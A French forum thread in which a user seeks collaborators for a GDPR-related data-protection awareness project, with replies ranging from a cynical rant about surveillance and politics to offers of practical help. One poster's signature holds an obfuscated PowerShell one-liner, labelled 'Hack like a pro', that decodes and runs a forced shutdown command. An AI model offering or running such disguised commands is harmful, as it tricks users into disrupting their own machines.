Annonce

Réduire
Aucune annonce.

sensibilisation du grand public à la protection des données personnelles

Réduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • sensibilisation du grand public à la protection des données personnelles

    Bonjour,
    j'aimerais travailler sur le sujet en objet, et recherche des hackers près à s'investir sur le sujet. Je suis en effet précoccupé par le très faible niveau de conscience de nos concitoyens en général sur ce sujet. J'ai plusieurs idées pour avancer à ce sujet, mais ai donc besoin de travailler avec des personnes techniquement compétentes pour avancer à ce sujet. Merci de prendre contact avec moi si le sujet vous intéresse.

  • #2
    Bonjour, je vais aller dans les grandes lignes de ma pensée.

    Tu sais si il y a bien un truc à savoir c'est que nos concitoyens n'ont que faire de leurs données personnelles.
    Pourquoi prendre le temps d'apprendre à connaître la technologie, quand Windows fait le promotion de son OS révolutionnaire qui offre pleins de possibilités et facile d'accès, pourquoi acheter un routeur différents de celui du FAI alors que tout fonctionne, pourquoi se soucier des malwares quand les antivirus existe? Je pourrais en faire pleins d'autres mais je pense que tu as compris.

    Tu sais ce qui conditionne cette mentalité c'est pas la sensibilisation à petites échelles sur des petites conférences, c'est la politique actuelle du pays et des entreprises dans le domaine qui:
    -Pour vendre font croire au meilleur.
    -A cause de la concurrence entre dans une course technologique qui les empêche de maîtriser correctement ces dernières.

    Je rajouterai qu'aujourd'hui aucun état n'a intérêt à faire campagne sur le sujet car un citoyen qui défends ses libertés c'est un citoyen incontrôlable par définition.
    Aujourd'hui dans chaque pays il existe un service de renseignement (pour n'en citer qu'un en France la DGSI), qui pratique un espionnage de masse sous couvert de l'idéologie nationale. Quand tu protège ta vie privée tu ne choisi pas de qui tu te protège, ainsi en bloquant les tentatives "d'espionnages" tu bloque aussi bien les crackers que ton gouvernement.

    Et encore sans aborder la partie SI...

    On est dans une société de consommation pas de compréhension, je me permet une petite parallèle politique : on l'a bien vu avec les élections présidentielles. Lorsque 55% des français veulent quitter l'UE, près de 71% sont contre le projet de loi travail, qui malgré une évidente conscience de la supercherie des médias malgré les différentes preuves et articles publiés pour les avertir du danger vote Macron à 66%.
    Nos citoyens comme tu dit, se nourrissent de tout ce que l'on peut leur donner tel des cochons insatiables (cf: Le Voyage de Chihiro).

    Alors j'espère pour toi que ta démarche est en partie motivé par l'argent, à défaut de changer les moeurs tu y gagnera au moins quelque chose, si motivé par ton humeur dans ce cas c'est tout à fait admirable mais bien utopique si tu veux mon avis.

    Pour finir en quelques mots,

    Les gens qui veulent se protéger se protège.


    Ps: Mes propos seront certainement durs mais j'espère que tu as compris ou je voulais en venir. Et si tu veux mon avis on nous soutire bien plus que des données personnelles...

    EDIT1: Si je m'en réfère à ton profil j'ai du mal à croire ce que tu écris sur ce topic "resp business developpement d'une grande entreprise d'internet en france", éthiquement parlant il y a déjà un problème.
    Dernière modification par Ephemeral25, 09 mai 2017, 20h27.
    "la Connaissance pour un éveil de la Conscience"

    Commentaire


    • #3
      mitch : Dans le cadre de la GDPR ? Je vais être amené à bosser dessus dans quelques semaines / mois, donc MP si oui, ça pourra m’intéresser.
      On tâchera de rester pragmatiques, les diatribes conspirationnistes à la Tyler Durden j'aime bien, mais ça fait pas franchement avancer les choses
      Hack like a pro :
      PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

      Commentaire


      • #4
        Ephemeral25 : j'ai bien lu ta réponse, merci.
        Krisscool : oui en effet dans le cadre de la GDPR notamment. Très en phase avec le pragmatisme :-) Attendons de voir si cela intéresse d'autres personnes et je te ferai signe. A +.

        Commentaire


        • #5
          Krisscool à défaut d'être schizophrènes et conspirationniste je suis réaliste. Je comprends pas pourquoi tu met en lien direct mes propos avec Fight Club, il me semble pas avoir parler d'antisystème .

          Bon courage pour le projet j'espère pour vous qu'il aboutira
          "la Connaissance pour un éveil de la Conscience"

          Commentaire

          Chargement...
          X